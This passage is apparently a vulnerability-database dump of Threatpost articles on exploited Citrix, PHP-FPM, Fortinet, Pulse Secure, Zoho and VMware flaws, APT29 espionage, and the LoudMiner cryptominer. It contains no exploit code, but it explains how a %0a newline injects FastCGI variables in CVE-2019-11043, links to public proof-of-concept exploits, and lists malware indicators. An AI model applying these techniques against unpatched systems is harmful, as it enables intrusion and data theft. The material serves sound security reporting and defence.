However, Citrix CISO Fermin Serna said in an accompanying [blog post](<https://www.citrix.com/blogs/2020/07/07/citrix-provides-context-on-security-bulletin-ctx276688/>) that the company isn\u2019t aware of any active exploitation of the issues so far, and he stressed that the barriers to exploitation of these flaws are significant.\n\n\u201cThere are barriers to many of these attacks; in particular, for customers where there is no untrustworthy traffic on the management network, the remaining risk reduces to a denial-of-service attack,\u201d he wrote. \u201cAnd in that case, only when Gateway or authentication virtual servers are being used. Other virtual servers, for example, load balancing and content switching virtual servers, are not affected by the issue.\u201d\n\nHe added, \u201cthree possible attacks additionally require some form of existing access. That effectively means an external malicious actor would first need to gain unauthorized access to a vulnerable device to be able to conduct an attack.\u201d\n\nSerna also noted that the bugs aren\u2019t related to the CVE-2019-19781 critical bug in Citrix ADC and Gateway, [announced in December](<https://threatpost.com/critical-citrix-bug-80000-corporate-lans-at-risk/151444/>). That zero-day flaw [remained unpatched](<https://threatpost.com/citrix-patch-rollout-critical-rce-flaw/152041/>) for almost a month and in-the-wild attacks [followed](<https://threatpost.com/chinese-hackers-exploit-cisco-citrix-espionage/154133/>).\n\n**_BEC and enterprise email fraud is surging, but DMARC can help \u2013 if it\u2019s done right. On July 15 at 2 p.m. 
ET, join Valimail Global Technical Director Steve Whittle and Threatpost for a _**[**_FREE webinar_**](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>)**_, \u201cDMARC: 7 Common Business Email Mistakes.\u201d This technical \u201cbest practices\u201d session will cover constructing, configuring, and managing email authentication protocols to ensure your organization is protected. _**[**_Click here to register_**](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>)**_ for this Threatpost webinar, sponsored by Valimail._**\n", "cvss3": {}, "published": "2020-07-07T14:44:30", "type": "threatpost", "title": "Citrix Bugs Allow Unauthenticated Code Injection, Data Theft", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-19781", "CVE-2020-5135", "CVE-2020-8187", "CVE-2020-8190", "CVE-2020-8191", "CVE-2020-8193", "CVE-2020-8194", "CVE-2020-8195", "CVE-2020-8196", "CVE-2020-8197", "CVE-2020-8198", "CVE-2020-8199"], "modified": "2020-07-07T14:44:30", "id": "THREATPOST:575F655420B93C2305DEE73F769E7E0B", "href": "https://threatpost.com/citrix-bugs-allow-unauthenticated-code-injection-data-theft/157214/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-06T21:57:01", "description": "A buffer underflow bug in PHP could allow remote code-execution (RCE) on targeted NGINX servers.\n\nFirst discovered during a hCorem Capture the Flag competition in September, the bug (CVE-2019-11043) exists in the FastCGI directive used in some PHP implementations on NGINX servers, according to researchers at Wallarm.\n\nPHP powers about 30 percent of modern websites, including popular web platforms like WordPress and Drupal \u2013 but NGINX servers are only vulnerable if they have PHP-FPM enabled (a non-default optimization feature that allows servers to execute scripts faster). 
The issue [is patched](<https://bugs.php.net/patch-display.php?bug_id=78599&patch=0001-Fix-bug-78599-env_path_info-underflow-can-lead-to-RC.patch&revision=latest>) in PHP versions 7.3.11, 7.2.24 and 7.1.33, which were released last week.\n\nIn a [Monday posting](<https://github.com/search?q=fastcgi_split_path&type=Code>), Wallarm researchers said that the bug can be exploited by sending specially crafted packets to the server by using the \u201cfastcgi_split_path\u201d directive in the NGINX configuration file. That file is configured to process user data, such as a URL. If an attacker creates a special URL that includes a \u201c%0a\u201d (newline) byte, the server will send back more data than it should, which confuses the FastCGI mechanism.\n\n\u201cIn particular, [the bug can be exploited] in a fastcgi_split_path directive and a regexp trick with newlines,\u201d according to Wallarm security researcher Andrew Danau, who found the bug. \u201cBecause of %0a character, NGINX will set an empty value to this variable, and fastcgi+PHP will not expect this\u2026.[as a result], it\u2019s possible to put [in] arbitrary FastCGI variables, like PHP_VALUE.\u201d\n\nAnother security researcher participating in the CTF exercise, Emil Lerner, offered more details in the [PHP bug tracker](<https://bugs.php.net/bug.php?id=78599>): \u201cThe regexp in `fastcgi_split_path_info` directive can be broken using the newline character (in encoded form, %0a). Broken regexp leads to empty PATH_INFO, which triggers the bug,\u201d he said.\n\nLerner [posted a zero-day proof-of-concept](<https://github.com/neex/phuip-fpizdam/>) exploit for the flaw that works in PHP 7 to allow code execution. 
The exploit makes use of an optimization used for storing FastCGI variables, _fcgi_data_seg.\n\n\u201cUsually, that sort of [buffer underflow] response is related to memory-corruption attacks and we expected to see an attack on the type of information disclosure,\u201d Wallarm researchers said. \u201cInformation disclosure is bad enough as it can result in leaking sensitive or financial data. Even worse, from time to time, although quite rarely, such behavior can indicate a remote code-execution vulnerability.\u201d\n\nResearchers added that without patching, this issue can be a dangerous entry point into web applications given the trivial nature of mounting an exploit.\n\nAdmins can identify vulnerable FastCGI directives in their NGINX configurations with a bash command, `egrep -Rin --color 'fastcgi_split_path' /etc/nginx/`, according to Wallarm.\n\n_**What are the top mistakes leading to data breaches at modern enterprises? Find out: Join experts from SpyCloud and Threatpost senior editor Tara Seals on our upcoming free **_[_**Threatpost webinar**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)_**, \u201cTrends in Fortune 1000 Breach Exposure.\u201d **_[_**Click here to register**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)_**.**_\n", "cvss3": {}, "published": "2019-10-28T16:18:11", "type": "threatpost", "title": "PHP Bug Allows Remote Code-Execution on NGINX Servers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-11043", "CVE-2020-0688", "CVE-2020-1472"], "modified": "2019-10-28T16:18:11", "id": "THREATPOST:DBA639CBD82839FDE8E9F4AE1031AAF7", "href": "https://threatpost.com/php-bug-rce-nginx-servers/149593/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-16T19:56:37", "description": "The advanced threat actor known as APT29 has been hard at work attempting to pilfer COVID-19 vaccine research from academic and 
pharmaceutical research institutions in various countries around the world, including the U.S.\n\nThat\u2019s according to a joint alert from the U.S. Department of Homeland Security (DHS), the U.K.\u2019s National Cyber Security Centre (NCSC) and Canada\u2019s Communications Security Establishment (CSE), [issued Thursday](<https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development>).\n\nThe 14-page advisory details the recent activity of Russia-linked APT29 (a.k.a. CozyBear or the Dukes), including the use of custom malware called \u201cWellMess\u201d and \u201cWellMail\u201d for data exfiltration.\n\n\u201cThroughout 2020, APT29 has targeted various organizations involved in COVID-19 vaccine development in Canada, the United States and the United Kingdom, highly likely with the intention of stealing information and intellectual property relating to the development and testing of COVID-19 vaccines,\u201d the report noted.\n\nThis specific activity was seen starting in April, but security researchers noted that nation-state espionage targeted to coronavirus treatments and cures [has been a phenomenon all year](<https://threatpost.com/nation-backed-apts-covid-19-spy-attacks/155082/>).\n\n\u201cCOVID-19 is an existential threat to every government in the world, so it\u2019s no surprise that cyber-espionage capabilities are being used to gather intelligence on a cure,\u201d said John Hultquist, senior director of analysis at Mandiant Threat Intelligence, via email. \u201cThe organizations developing vaccines and treatments for the virus are being heavily targeted by Russian, Iranian and Chinese actors seeking a leg up on their own research. 
We\u2019ve also seen significant COVID-related targeting of governments that began as early as January.\u201d\n\n## **Exploits in Play**\n\nTo mount the attacks, APT29 is using exploits for known vulnerabilities to gain initial access to targets, according to the analysis, along with spearphishing to obtain authentication credentials to internet-accessible login pages for target organizations. The exploits in rotation include the recent [Citrix code-injection bug](<https://threatpost.com/citrix-bugs-allow-unauthenticated-code-injection-data-theft/157214/>) (CVE-2019-19781); a publicized [Pulse Secure VPN flaw](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>) (CVE-2019-11510); and issues in FortiGate (CVE-2018-13379) and Zimbra (CVE-2019-9670).\n\n\u201cThe group conducted basic vulnerability scanning against specific external IP addresses owned by the [targeted] organizations,\u201d according to the report. \u201cThe group then deployed public exploits against the vulnerable services identified. 
The group has been successful using recently published exploits to gain initial footholds.\u201d\n\nOnce a system is compromised, the group then looks to obtain additional authentication credentials to allow further access and spread laterally.\n\n## **Custom Malware**\n\nOnce established in a network, APT29 is employing homegrown malware that the NCSC is calling WellMess and WellMail, to conduct further operations on the victim\u2019s system and exfiltrate data.\n\nWellMess, first discovered in July 2018, is malware that comes in Golang or .NET versions and supports HTTP, TLS and DNS for communications.\n\nNamed after one of the function names in the malware, \u201cWellMess is a lightweight malware designed to execute arbitrary shell commands, upload and download files,\u201d according to the advisory.\n\nWellMail, meanwhile, named after file paths containing the word \u2018mail\u2019 and the use of server port 25, is also lightweight \u2013 and is designed to run commands or scripts while communicating with a hardcoded command-and-control (C2) server.\n\n\u201cThe binary is an ELF utility written in Golang which receives a command or script to be run through the Linux shell,\u201d according to the NCSC. \u201cTo our knowledge, WellMail has not been previously named in the public domain.\u201d\n\nBoth malware families use hard-coded client and certificate authority TLS certificates to communicate with their C2 servers.\n\n\u201cWellMess and WellMail samples contained TLS certificates with the hard-coded subjectKeyIdentifier (SKI) \u20180102030406\u2019, and used the subjects \u2018C=Tunis, O=IT\u2019 and \u2018O=GMO GlobalSign, Inc\u2019 respectively,\u201d detailed the report. \u201cThese certificates can be used to identify further malware samples and infrastructure. 
Servers with this GlobalSign certificate subject may be used for other functions in addition to WellMail malware communications.\u201d\n\nAPT29 is also using another malware, dubbed \u2018SoreFang\u2019 by the NCSC, which is a first-stage downloader that uses HTTP to exfiltrate victim information and download second-stage malware. It\u2019s using the same C2 infrastructure as a WellMess sample, the agencies concluded.\n\nThis sample is not a custom job: \u201cIt is likely that SoreFang targets SangFor devices. Industry reporting indicates that other actors, reportedly including [DarkHotel](<https://threatpost.com/microsoft-zero-day-actively-exploited-patch/152018/>), have also targeted SangFor devices,\u201d noted the NCSC.\n\n## **APT29: A Sporadically High-Profile Threat**\n\n[APT29](<https://attack.mitre.org/groups/G0016/>) has long been seen targeting high-value targets across the think-tank, law enforcement, media, U.S. military, imagery, transportation, pharmaceutical, national government and defense contracting sectors.\n\nThe group is perhaps best-known for the [intrusion](<https://threatpost.com/dnc-hacked-research-on-trump-stolen/118656/>) at the Democratic National Committee ahead of the U.S. presidential election in 2016. 
It was also implicated in [a widespread phishing campaign](<https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/>) in November 2016, in attacks against the White House, State Department and Joint Chiefs of Staff.\n\nIt was next seen in November 2017 [executing a Tor backdoor](<https://threatpost.com/apt29-used-domain-fronting-tor-to-execute-backdoor/124582/>), and then [it reemerged](<https://threatpost.com/apt29-re-emerges-after-2-years-with-widespread-espionage-campaign/139246/>) in 2018 with a widespread espionage campaign against military, media and public-sector targets.\n\nIts history stretches back a few years though: It [was also seen](<https://threatpost.com/white-house-state-department-counted-among-cozyduke-apt-victims/112382/>) by Kaspersky Lab carrying out data-mining attacks against the White House and the Department of State in 2014.\n\nResearchers from firms [like Mandiant](<https://www.fireeye.com/current-threats/apt-groups/rpt-apt29.html>) believe APT29 to be linked to Russian government-backed operations \u2013 an assessment that the DHS and NCSC reiterated in the latest advisory, saying that it is \u201calmost certainly part of the Russian intelligence services.\u201d\n\nWhile its publicly profiled activity tends to be sporadic, APT29 is rarely at rest, according to Mandiant\u2019s Hultquist.\n\n\u201cDespite involvement in several high-profile incidents, APT29 rarely receives the same attention as other Russian actors because they tend to quietly focus on intelligence collection,\u201d he said via email. 
\u201cWhereas GRU actors have brazenly leaked documents and carried out destructive attacks, APT29 digs in for the long term, siphoning intelligence away from its target.\u201d\n\nThis latest case is no exception to that M.O., according to the advisory: \u201cAPT29 is likely to continue to target organizations involved in COVID-19 vaccine research and development, as they seek to answer additional intelligence questions relating to the pandemic,\u201d the agencies concluded.\n\nThat said, at least one researcher warned that the end-game of the activity might be more nefarious than simply getting a leg up on a cure.\n\n\u201cAPT29 (Cozy Bear, Office Monkeys) has successfully demonstrated the extension of nation-state power through cyber-action for more than a dozen years,\u201d Michael Daly, CTO at Raytheon Intelligence & Space, said via email. \u201cHowever, they are not focused on simple intellectual property theft. Instead, their focus is rooted in influence operations \u2013 the changing of hearts and minds to thwart and diminish the power of governments and organizations.\u201d\n\nHe added, \u201cIn the case of this breach of vaccine research centers, we should be most concerned not that someone else might also get a vaccine, but that the information will be used to undermine the confidence of the public in the safety or efficacy of the vaccines, slowing their adoption, or in some way cause their release to be delayed. 
The effect of such a delay would be both impactful to the health of Western populations, but also to the social stability and economic stability of the West.\u201d\n", "cvss3": {}, "published": "2020-07-16T18:05:20", "type": "threatpost", "title": "Hackers Look to Steal COVID-19 Vaccine Research", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2019-9670"], "modified": "2020-07-16T18:05:20", "id": "THREATPOST:1FB73160B6AAB2B0406816BB6A61E4CB", "href": "https://threatpost.com/state-sponsored-hackers-steal-covid-19-vaccine-research/157514/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-04-16T18:13:10", "description": "The Feds are warning that nation-state actors are once again after U.S. assets, this time in a spate of cyberattacks that exploit five vulnerabilities that affect VPN solutions, collaboration-suite software and virtualization technologies.\n\nAccording to the U.S. National Security Agency (NSA), which issued [an alert Thursday,](<https://www.nsa.gov/News-Features/Feature-Stories/Article-View/Article/2573391/russian-foreign-intelligence-service-exploiting-five-publicly-known-vulnerabili/%20/#pop5008885>) the advanced persistent threat (APT) group [known as APT29](<https://threatpost.com/state-sponsored-hackers-steal-covid-19-vaccine-research/157514/>) (a.k.a. Cozy Bear or The Dukes) is conducting \u201cwidespread scanning and exploitation against vulnerable systems in an effort to obtain authentication credentials to allow further access.\u201d\n\nThe targets include U.S. and allied national-security and government networks, it added.\n\nThe five bugs under active attack are known, fixed security holes in platforms from Citrix, Fortinet, Pulse Secure, Synacor and VMware (detailed below) that organizations should patch immediately, researchers warned.\n\n\u201cSome of these vulnerabilities also have working Metasploit modules and are currently being widely exploited,\u201d said researchers with Cisco Talos, in a [related posting](<https://blog.talosintelligence.com/2021/04/nsa-svr-coverage.html#more>) on Thursday. \u201cPlease note that some of these vulnerabilities exploit applications leveraging SSL. This means that users should enable SSL decryption\u2026to detect exploitation of these vulnerabilities.\u201d\n\nThe NSA has linked APT29 to Russia\u2019s Foreign Intelligence Services (SVR). The news comes as the U.S. formally attributed the recent [SolarWinds supply-chain attack](<https://threatpost.com/solarwinds-orion-bug-remote-code-execution/163618/>) to the SVR and issued sanctions on Russia for cyberattacks and what President Biden called out as interference with U.S. elections.\n\n## **The 5 Vulnerabilities Being Actively Exploited**\n\nAccording to the NSA, the following are under widespread attack in cyber-espionage efforts:\n\n * CVE-2018-13379 Fortinet FortiGate SSL VPN (path traversal)\n * CVE-2019-9670 Synacor Zimbra Collaboration Suite (XXE)\n * CVE-2019-11510 Pulse Secure Pulse Connect Secure VPN (arbitrary file read)\n * CVE-2019-19781 Citrix Application Delivery Controller and Gateway (directory traversal)\n * CVE-2020-4006 VMware Workspace ONE Access (command injection)\n\n\u201cVulnerabilities in two VPN systems, two virtualization platforms and one collaboration solution seem to be a mighty combo,\u201d Dirk Schrader, global vice president of security research at New Net Technologies, told Threatpost. 
\u201cFour of them are 12 months or older, which is not a good sign for the overall cyber-hygiene in the U.S., given that all are either rated as severe or even critical in NIST\u2019s NVD. It looks like adversaries can rely on the lack of diligence related to essential cybersecurity control, even more so in pandemic times.\u201d\n\n## **CVE-2018-13379**\n\nA directory traversal vulnerability in Fortinet FortiOS allows unauthenticated attackers to access and download system files, by sending specially crafted HTTP resource requests. \u201cThis can result in the attacker obtaining VPN credentials, which could allow an initial foothold into a target network,\u201d according to Cisco Talos.\n\nThe NSA explained that it arises from an improper limitation of a pathname to a restricted directory. It affects Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12.\n\nThe nation-state issue is ongoing: Earlier in April, the FBI and the Cybersecurity and Infrastructure Security Agency (CISA) [warned that](<https://threatpost.com/fbi-apts-actively-exploiting-fortinet-vpn-security-holes/165213/>) APTs were actively exploiting the bug.\n\n## **CVE-2019-9670**\n\nThis bug is an XML External Entity Injection (XXE) vulnerability in the mailbox component of the Synacor Zimbra Collaboration Suite. Attackers can exploit it to gain access to credentials to further their access or as an initial foothold into a target network. It affects Synacor Zimbra Collaboration Suite 8.7.x before 8.7.11p10.\n\n## **CVE-2019-11510**\n\nIn Pulse Secure VPNs, a critical arbitrary file-reading flaw opens systems to exploitation from remote, unauthenticated attackers looking to gain access to a victim\u2019s networks. An attacker can send a specially crafted URI to trigger the exploit. 
It affects Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4.\n\n\u201cThis can be abused by attackers to access sensitive information, including private keys and credentials,\u201d explained Cisco Talos researchers.\n\nLast April, the Department of Homeland Security (DHS) began urging companies that use Pulse Secure VPNs to change their passwords for Active Directory accounts, after several cyberattacks targeted companies who had previously patched a related flaw in the VPN family.\n\nAt the time, DHS [warned that attackers](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>) who have already exploited the flaw to snatch up victims\u2019 credentials were using those credentials to move laterally through organizations, rendering patches useless.\n\nThen in September, a successful cyberattack on an unnamed federal agency [was attributed to](<https://threatpost.com/feds-cyberattack-data-stolen/159541/>) exploitation of the bug. \u201cIt is possible the cyber-actor obtained the credentials from an unpatched agency VPN server by exploiting a known vulnerability \u2013 CVE-2019-11510 \u2013 in Pulse Secure,\u201d according to CISA\u2019s alert at the time. \u201cCVE-2019-11510\u2026allows the remote, unauthenticated retrieval of files, including passwords. CISA has observed wide exploitation of CVE-2019-11510 across the federal government.\u201d\n\n## **CVE-2019-19781**\n\nThis critical directory-traversal vulnerability in the Citrix Application Delivery Controller (ADC) and Gateway can allow remote code-execution. 
It was first disclosed as a zero-day in December 2019, after which Citrix [rolled out patches](<https://threatpost.com/citrix-patch-rollout-critical-rce-flaw/152041/>) amidst dozens of proof-of-concept exploits and skyrocketing exploitation attempts.\n\nIt affects Citrix ADC and Gateway versions before 13.0.47.24, 12.1.55.18, 12.0.63.13, 11.1.63.15 and 10.5.70.12 and SD-WAN WANOP 4000-WO, 4100-WO, 5000-WO, and 5100-WO versions before 10.2.6b and 11.0.3b.\n\n## **CVE-2020-4006**\n\nAnd finally, a command-injection vulnerability in VMware Workspace ONE Access, Access Connector, Identity Manager and Identity Manager Connector allows arbitrary command execution on underlying operating systems. A successful exploit does, however, require valid credentials to the configurator admin account, so it must be chained with another bug to use it.\n\nNonetheless, in December the NSA [warned that](<https://threatpost.com/nsa-vmware-bug-under-attack/161985/>) foreign adversaries were zeroing in on exploiting the flaw, despite patches rolling out just days earlier. 
State actors were using the bug to pilfer protected data and abuse shared authentication systems, it said.\n\nIt affects VMware One Access 20.01 and 20.10 on Linux, VMware Identity Manager 3.3.1 \u2013 3.3.3 on Linux, VMware Identity Manager Connector 3.3.1 \u2013 3.3.3 and 19.03, VMware Cloud Foundation 4.0 \u2013 4.1, and VMware Vrealize Suite Lifecycle Manager 8.x.\n\n## **How Can I Protect Against Cyberattacks?**\n\nThe NSA recommended several best practices to protect organizations from attack:\n\n * Update systems and products as soon as possible after patches are released.\n * Assume a breach will happen; review accounts and leverage the latest eviction guidance available.\n * Disable external management capabilities and set up an out-of-band management network.\n * Block obsolete or unused protocols at the network edge and disable them in client device configurations.\n * Adopt a mindset that compromise happens: Prepare for incident response activities.\n\n\u201cIf publicly known, patchable exploits still have gas in the tank, this is just an indictment against the status-quo disconnect between many organizations\u2019 understanding of risk and basic IT hygiene,\u201d Tim Wade, technical director on the CTO team at Vectra, told Threatpost. \u201cThe unfortunate reality is that for many organizations, the barrier to entry into their network continues to be low-hanging fruit which, for one reason or another, is difficult for organizations to fully manage.\u201d\n\nHe added, \u201cThis underscores why security leaders should assume that for all the best intentions of their technology peers, compromises will occur \u2013 their imperative is to detect, respond and recover from those events to expel adversaries before material damage is realized.\u201d\n\n**_Ever wonder what goes on in underground cybercrime forums? Find out on April 21 at 2 p.m. 
ET during a _**[**_FREE Threatpost event_**](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)**_, \u201cUnderground Markets: A Tour of the Dark Economy.\u201d Experts from Digital Shadows (Austin Merritt), Malwarebytes (Adam Kujawa) and Sift (Kevin Lee) will take you on a guided tour of the Dark Web, including what\u2019s for sale, how much it costs, how hackers work together and the latest tools available for hackers. _**[**_Register here_**](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)**_ for the Wed., April 21 LIVE event. _**\n", "cvss3": {}, "published": "2021-04-16T18:10:09", "type": "threatpost", "title": "NSA: 5 Security Bugs Under Active Nation-State Cyberattack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2019-9670", "CVE-2020-4006"], "modified": "2021-04-16T18:10:09", "id": "THREATPOST:2E607CF584AE6639AC690F7F0CE8C648", "href": "https://threatpost.com/nsa-security-bugs-active-nation-state-cyberattack/165446/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-05-07T21:56:19", "description": "An unusual cryptocurrency miner, dubbed LoudMiner, is spreading via pirated copies of Virtual Studio Technology. It uses virtualization software to mine Monero on a Tiny Core Linux virtual machine \u2013 a unique approach, according to researchers.\n\nVirtual Studio Technology (VST) is an audio plug-in software interface that integrates software synthesizers and effects in digital audio workstations. The idea is to simulate traditional recording studio functions. ESET analysts recently uncovered a WordPress-based website hawking trojanized packages that incorporate the popular software, including Propellerhead Reason, Ableton Live, Reaktor 6, AutoTune and others. 
In all, there are 137 VST-related applications (42 for Windows and 95 for macOS) available for download on the site.\n\nUpon downloading, an unwitting audiophile\u2019s computer would be infected with LoudMiner, which consists of the VST application bundled with virtualization software, a Linux image and additional files used to achieve persistence. It uses the XMRig cryptominer hosted on a virtual machine. So far, three macOS versions and one Windows variant of the malware have been uncovered.\n\n\u201cRegarding the nature of the applications targeted, it is interesting to observe that their purpose is related to audio production,\u201d wrote Michal Malik, researcher at ESET, [in a posting](<https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/>) on Thursday. \u201cThus, the machines that they are installed on should have good processing power and high CPU consumption will not surprise the users.\u201d\n\nBecause the victim would also get a functioning version of the application that they expected, the attackers gain some air cover.\n\n\u201cThese applications are usually complex, so it is not unexpected for them to be huge files,\u201d Malik explained. 
\u201cThe attackers use this to their advantage to camouflage their virtual machine (VM) images.\u201d\n\nDespite the efforts at camouflage, victims quickly become aware that something\u2019s amiss, thanks to system slowdowns, according to [forum postings](<https://discussions.apple.com/thread/8602989>).\n\n\u201cUnfortunately, had to reinstall OSX, the problem was that Ableton Live 10, which I have downloaded it from a torrent site and not from the official site, installs a miner too, running at the background causing this,\u201d said a user named \u201cMacloni.\u201d\n\n\u201cThe same user attached screenshots of the Activity Monitor indicating 2 processes \u2013 qemu-system-x86_64 and tools-service \u2013 taking 25 percent of CPU resources and running as root,\u201d said Malik, adding that some users found a full 100 percent of their CPU capacity hijacked.\n\n## Using a Virtual Machine\n\nLoudMiner uses QEMU on macOS and VirtualBox on Windows to run a Linux image in a VM \u2013 more specifically, a Tiny Core Linux 9.0 image configured to run XMRig. The Linux image joins a mining pool, drawing on the victim\u2019s CPU for hashing power.\n\nMalik noted that the decision by the malware authors to use VMs for performing the mining instead of hosting it locally on the victim\u2019s computer is \u201cquite remarkable and this is not something we routinely see\u201d \u2013 although it\u2019s not unheard of for legitimate miners to [deploy the strategy](<https://medium.com/@Jayvdb/how-to-start-mining-cryptocurrency-for-fun-and-possibly-profit-71517859ed91>) to save money.\n\n\u201cUser downloads the application and follows attached instructions on how to install it. LoudMiner is installed first, the actual VST software after,\u201d he explained. \u201cLoudMiner hides itself and becomes persistent on reboot. 
The Linux virtual machine is launched and [the mining starts](<https://threatpost.com/cryptomining-malware-uninstalls-cloud-security-products/140959/>). Scripts inside the virtual machine can contact the C2 server to update the miner.\u201d\n\nHe said that in order to identify a particular mining session, a file containing the IP address of the machine and the day\u2019s date is created by the \u201cidgenerator\u201d script, and its output is sent to the C2 server by the \u201cupdater.sh\u201d script.\n\nBecause LoudMiner uses a mining pool, it\u2019s impossible to retrace potential transactions to find out how successful the adversaries have been thus far, he added.\n\nTo avoid the threat, age-old advice applies: Don\u2019t download pirated copies of commercial software. Malik also offered some hints to identify when an application contains unwanted code. Red flags include a trust popup from an unexpected, \u201cadditional\u201d installer; high CPU consumption by a process one did not install (QEMU or VirtualBox in this case); a new service added to the startup services list; and network connections to curious domain names (such as system-update[.]info or system-check[.]services).\n", "cvss3": {}, "published": "2019-06-20T19:53:23", "type": "threatpost", "title": "LoudMiner Cryptominer Uses Linux Image and Virtual Machines", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-18935"], "modified": "2019-06-20T19:53:23", "id": "THREATPOST:FD8657F42A74CEDAA8D3F25A2362E6E8", "href": "https://threatpost.com/loudminer-cryptominer-linux/145871/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-10T12:44:24", "description": "UPDATE\n\nA zero-day vulnerability has been disclosed in Zoho Corp.\u2019s ManageEngine Desktop Central endpoint management software. The serious vulnerability enables an unauthenticated, remote attacker to launch attacks on affected systems. 
Zoho has now [released a security update](<https://www.us-cert.gov/ncas/current-activity/2020/03/06/zoho-releases-security-update-manageengine-desktop-central>) addressing the vulnerability.\n\nAs of Monday, March 9, the vulnerability has been observed being actively exploited in the wild, according to a [Center for Internet Security advisory](<https://www.cisecurity.org/advisory/a-vulnerability-in-manageengine-desktop-central-could-allow-for-remote-code-execution_2020-033/>).\n\nThe vulnerability, [first reported by ZDNet](<https://www.zdnet.com/article/zoho-zero-day-published-on-twitter/#ftag=RSSbaffb68>), exists in Zoho ManageEngine Desktop Central, an endpoint management tool that lets administrators manage servers, laptops, smartphones and more from a central location. Steven Seeley of Source Incite [disclosed the flaw](<https://srcincite.io/advisories/src-2020-0011/>) on Twitter on Thursday, along with a proof-of-concept (PoC) exploit. According to ZDNet, the enterprise software development company will release a patch for the flaw on Friday.\n\n\u201cThis vulnerability allows remote attackers to execute arbitrary code on affected installations of ManageEngine Desktop Central. Authentication is not required to exploit this vulnerability,\u201d according to Seeley.\n\nAccording to Seeley, the specific flaw exists within the FileStorage class of Desktop Central, which handles data being read from or written to a file. 
The issue results from improper validation of user-supplied data, which can result in deserialization of untrusted data.\n\nSeeley told Threatpost that an attacker can leverage this vulnerability to execute code in the context of SYSTEM, giving them \u201cfull control of the target machine\u2026 basically the worst it gets.\u201d\n\n> Since [@zoho](<https://twitter.com/zoho?ref_src=twsrc%5Etfw>) typically ignores researchers, I figured it was OK to share a ManageEngine Desktop Central zero-day exploit with everyone. UnCVE'ed, unpatched and unauthenticated RCE as SYSTEM/root. Enjoy!\n> \n> Advisory: <https://t.co/U9LZPp4l5o> \nExploit: <https://t.co/LtR75bhooy>\n> \n> \u2014 \u03fb\u0433_\u03fb\u03b5 (@steventseeley) [March 5, 2020](<https://twitter.com/steventseeley/status/1235635108498948096?ref_src=twsrc%5Etfw>)\n\nAccording to Seeley, who also posted a [PoC attack for the flaw on Twitter](<https://srcincite.io/pocs/src-2020-0011.py.txt>), the vulnerability ranks 9.8 out of 10.0 on the CVSS scale, making it critical in severity. Nate Warfield, a security researcher with Microsoft, pointed to [at least 2,300](<https://twitter.com/n0x08/status/1235637306838532096>) Zoho systems potentially exposed online.\n\nRick Holland, CISO and vice president of strategy at Digital Shadows, said if an attacker can compromise a solution like ManageEngine, they have an \u201copen season\u201d on a target company\u2019s environment.\n\n\u201cAn attacker has a myriad of options not limited to: accelerating reconnaissance of the target environment, deploying their malware including ransomware, or even remotely monitoring users\u2019 machines,\u201d Holland told Threatpost. \u201cGiven that this vulnerability enables unauthenticated remote execution of code, it is even more vital that companies deploy a patch as soon as it becomes available. 
Internet-facing deployments of Desktop Central should be taken offline immediately.\u201d\n\nThreatpost has reached out to Zoho via email and Twitter for further comment; the company has not yet responded. However, Zoho said on Twitter, \u201cwe have identified the issue and are working on a patch with top priority. We will update once it is done.\u201d\n\n> We have identified the issue and are working on a patch with top priority. We will update once it is done. ^BG\n> \n> \u2014 Zoho (@zoho) [March 6, 2020](<https://twitter.com/zoho/status/1235811733194682368?ref_src=twsrc%5Etfw>)\n\nSeeley told Threatpost that he didn\u2019t contact Zoho before disclosing the vulnerability due to negative previous experiences with the company regarding vulnerability disclosure. \u201cI have in the past for other critical vulnerabilities and they ignored me,\u201d he said.\n\nThe decision to bypass coordinated disclosure has drawn mixed opinions from security experts. Some, like Rui Lopes, engineering and technical support director at Panda Security, told Threatpost that the incident could leave vulnerable systems open to bad actors.\n\n\u201cThere seems to be some breakdown of communication between independent researchers and the solution vendors who offer centralized IT management platforms, which inevitably leads to inefficient patching protocols and the exposure of sensitive information that arms bad actors with threat vectors that would be otherwise unknown.\u201d\n\nTim Wade, technical director of the CTO Team at Vectra, told Threatpost that the incident highlights the need for better relationships between security researchers and organizations.\n\n\u201cAllegedly, Zoho\u2019s reputation for ignoring security researchers who\u2019ve found exploitable bugs in their products factored into the decision for a direct release,\u201d he said. 
